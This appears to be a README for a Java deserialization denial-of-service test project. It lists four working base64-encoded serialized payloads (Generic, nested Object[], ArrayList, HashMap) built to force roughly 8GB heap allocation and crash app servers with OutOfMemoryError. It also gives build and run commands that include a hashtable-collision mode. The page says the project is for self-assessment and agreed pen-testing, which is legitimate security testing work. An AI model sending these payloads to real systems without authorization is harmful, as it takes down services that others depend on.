Home

Awesome

ObjectInputStream DoS

Project to safely test Java Serialization vulnerability using DoS (OutOfMemoryError)

Provided as-is, only for self-assessment, agreed pen-testing purposes, etc.

Basic Scenarios

Payloads for 8GB heap consumption

Should be enough to test the vulnerability in most app servers.

Generic (9 bytes):

rO0ABX1////3

Nested Object[] (44 bytes):

rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cH////c=

Nested ArrayList (67 bytes):

rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHB////3dwR////3cHBwcHBwcHBwcA==

Nested HashMap (110 bytes):

rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABBAAAAAc3EAfgAAP0AAAAAAAAx3CAAAABBAAAAAcHB4cHg=

Payloads for collision attacks

Build & Run

mvn clean package

java -Xmx25g -jar target/oisdos-1.0.jar

E.g:

java -Xmx25g -jar target/oisdos-1.0.jar Generic

java -Xmx25g -jar target/oisdos-1.0.jar ArrayListHeap

java -Xmx25g -jar target/oisdos-1.0.jar HashtableCollisions 5000

Other info